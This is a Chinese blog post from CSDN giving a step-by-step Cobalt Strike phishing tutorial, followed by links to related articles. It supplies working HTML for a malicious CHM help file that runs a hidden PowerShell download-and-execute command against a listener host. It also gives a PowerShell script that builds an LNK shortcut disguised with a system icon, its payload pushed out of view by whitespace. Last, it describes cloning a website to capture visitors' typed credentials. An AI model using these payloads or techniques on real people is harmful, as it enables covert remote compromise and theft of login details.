cobaltstrike--CHM、LNK钓鱼&网站钓鱼

已于 2022-01-22 12:54:52 修改
阅读量3.8k 收藏 6
点赞数 4
文章标签: web安全 cobltstrike
于 2022-01-22 12:53:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/122605750
版权

1.CHM钓鱼

1)制作CHM

创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件

 将下列代码复制到文件夹中的index.html中

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

打开EasyCHM

 编译完成后,会生成一个CHM文件,一旦点击就会弹出计算器

2)生成钓鱼文件

 建立一个监听

 生成恶意powershell

 

 将生成的内容代替index.html中的calc.exe,并且一些单双引号也需修改

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.2.128:80/a'))">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

 3)再次生成CHM文件,发送至目标,运行

发现目标上线

 2.LNK钓鱼

1)做个简单的powershell生产图标

 创建个txt文本写入下面代码然后改文件后缀名为.ps1

cmd /c calc.exe

右键,powershell运行后会弹出计算器

 2)生成钓鱼文件

 建立一个监听

 生成恶意powershell

 

新建一个1.txt,写入如下

cmd /c 生成的代码

将下面的powershell代码写入1234.ps1文件,右键运行powershell

$file = Get-Content "1.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = '                                                                                                                                                                                                                                    '+ $file
$Shortcut.Save()

 生成test.lnk文件,而且图标改了(powershell执行文件要和1.txt要在一个目录下)

 3)发送至目标,运行

 发现目标上线

3.网站克隆

 1)克隆网站

 

 2)访问克隆后的网站

 

 3)查看访问者输入内容

 

Z_l123
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
使用CobaltStrike制作钓鱼网站
问题很多的小明
08-13 2997
0x01 寻找网站模板 找有登录框的或者你想克隆的网站 0x02 CS克隆网站,并开启输入监听 填写克隆地址,勾选键盘监听 下一步填写VPS公网地址: 然后点击site按钮后,可以查看到钓鱼的服务端口以及状态 0x03访问测试 访问vps的ip以及对应端口 输入测试 查看web日志 看到用户输入账号密码 ...
红蓝对抗中的钓鱼技术
不忘初心,护天下安全!
10-10 4415
ftp加!可以执行命令首先创建一个ftp的快捷方式,快捷方式的起始位置留空,目标为:C:\Winodws\System32\ftp.exe -""s:abc.dll快捷方式的图标以及名字可以进行适当的伪装:后门恶意链接的生成方式,在CobaltStike中点击:Scripted Wed Delivery(s)p此处是使用了无文件攻击的思路,直接调用powershell执行恶意操作会很容易被360等杀软拦截。
细说——Cobalt Strike钓鱼
LainWith的博客
10-10 2479
目录启动环境windows服务端启动windows启动客户端HTA恶意文件投递1. 生成恶意HTA2. HTA利用3. 上钩信息收集(System Profiler)1. 生成恶意地址2. 战果网站克隆http类型网站1. 克隆网站2. 受害者访问克隆站点3. 监视日志https类型网站网站克隆+木马下载1. 准备木马2. 生成木马地址3. 克隆网站4. 受害者上钩参考 总结了网上关于Cobalt Strike钓鱼的相关文章,合并成了这篇学习笔记 启动环境 环境介绍: win7(虚拟机) 【攻击者】—
使用powershell Client进行有效钓鱼
最新发布
aihua002的博客
06-23 1443
Powershell是windows下面非常强大的命令行工具,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。
快捷执行方式_红队攻防之LNK快捷方式钓鱼
weixin_42531710的博客
01-09 2144
点击上方“蓝字”,发现更多精彩。0x00 LNK快捷方式介绍lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。“.lnk”是WINDOWS系统默认bai的快捷方式的扩展名,如果“文件夹选项”下设置为“隐藏已知文件类型的扩展名”,正常情况下“.lnk”是不显示的。0x01 准备工具及流程准备工具:Cobalt Stri...
内网渗透神器CobaltStrike钓鱼攻击(六)
xf555er的博客
11-22 2874
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
CobaltStrike的安装配置及使用,实现office钓鱼
bwxzdjn的博客
04-18 4199
渗透测试软件Cobalt Strike的安装和使用,以及利用其进行office钓鱼
陌陌分享_文档钓鱼1
08-03
在本文中,我们将深入探讨几种常见的文档钓鱼方式,包括CHMLNK、HTA文件钓鱼,以及macros(Office宏)等。 首先,CHM(已编译的帮助文件)是一种基于HTML的编译存储格式,常被用于创建帮助文档。黑客可以利用Easy...
常见的钓鱼招式,可千万别入坑哦
HBohan的博客
10-19 412
OFFICE 【查看资料】 Office安全保护机制 受保护的视图 为了保护计算机不受office病毒侵害,微软设计了一个收保护视图,将所有可疑的office文件以只读方式打开,在该模式下多数编辑功能被禁用。文件呗以受保护视图打开的情况有如下几种 文件是从 Internet 位置打开的 文件是通过 Outlook 附件的方式接收的,并且计算机策略将发件人定义为不安全 文件是从不安全的位置打开的 文件被文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDr.
红蓝对抗钓鱼篇之从入门到放弃
xnxqwzy的博客
09-13 200
上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。
攻防演练比赛中攻击队常用的测试方法列举
maoguan121的博客
09-29 1204
在实战过程中,蓝队专家根据实战攻防演练的任务特点逐渐总结 出一套成熟的做法:外网纵向突破重点寻找薄弱点,围绕薄弱点,利 用各种攻击手段实现突破;内网横向拓展以突破点为支点,利用各种 攻击手段在内网以点带面实现横向拓展,遍地开花。实战攻防演练 中,各种攻击手段的运用往往不是孤立的,而是相互交叉配合的,某 一渗透拓展步骤很难只通过一种手段实现,通常需要同时运用两种或 两种以上的手段才能成功。
制作chm 手册_红队攻防之CHM文档钓鱼
weixin_42131443的博客
01-15 1378
0x00 CHM简单介绍CHM(Compiled Help Manual)即“已编译的帮助文件”。它是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存。因为使用方容便,形式多样也常被采用作为电子书的格式。而该类型的文件是可以用Windows自带的hh.exe文件来进行打开。0x01 准备工具及流程准备工具:EasyCHMCobalt Strike、My...
【渗透测试】Cobalt Strike制作钓鱼邮件渗透Windows
qq_51143406的博客
07-20 838
使用cobalt strike制作钓鱼邮件进行渗透
红队钓鱼技术之LNK快捷方式
xf555er的博客
08-07 1151
lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
网络安全——cobalt Strike 之office钓鱼
weixin_54055099的博客
09-03 1693
Cobalt strike 之office 钓鱼
钓鱼篇-CHM电子书上线CS
weixin_45701675的博客
11-23 2133
利用电子书上线cobalt strike
勒索软件好多都使用恶意LNK链接文件欺骗用户 来看趋势科技分析新型LNK-PowerShell攻击...
weixin_34090562的博客
09-01 871
当你在桌面或者邮件中看到一个熟悉的图标快捷方式,你估计不会想到一个1、2K的文件,就足以让你中招勒索软件。本文就是给你展示这么小的文件中,会包含多少恶意信息。在文章的开头,先让我们来看两个概念,Lnk文件说明是小编加的(具体分析看原文),其它保持文章原有内容。 Powershell是什么 PowerShell是微软公司开发的一种通用命令行和Shell脚本...
一道关于chm设计ctf钓鱼的一些思考
weixin_30820077的博客
06-09 158
版权声明:本文为博主的原创文章,未经博主同意不得转载 题目:flag就是文件指向的地址 文件:作为一名web狗的出题人,这道ctf有点意思不是在于因为它难,而是相对于一些代码审计以及一些杂项题来说,它只是很好玩。首先,我们看到题目是一个chm文件。chm文件在钓鱼中比较常见的。比如很久以前的那些动作片种子,下载回来总会有个chm文件的图片简介在文件目录下,那些充满诱惑的FBI war...
2022钓鱼利器,LNK文件攻击为何广受青睐
shandongjiushen的博客
03-21 1008
恶意LNK文件活动增多
利用CVE-2017-8464漏洞:LNK文件远程代码执行技术解析
"E037-服务漏洞利用及加固-利用CVE-2017-8464漏洞实现LNK文件远程代码执行" 这篇资料主要讲述了如何利用CVE-2017-8464漏洞进行LNK文件的远程代码执行攻击,并提供了加固服务的实践步骤。CVE-2017-8464是微软Windows...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值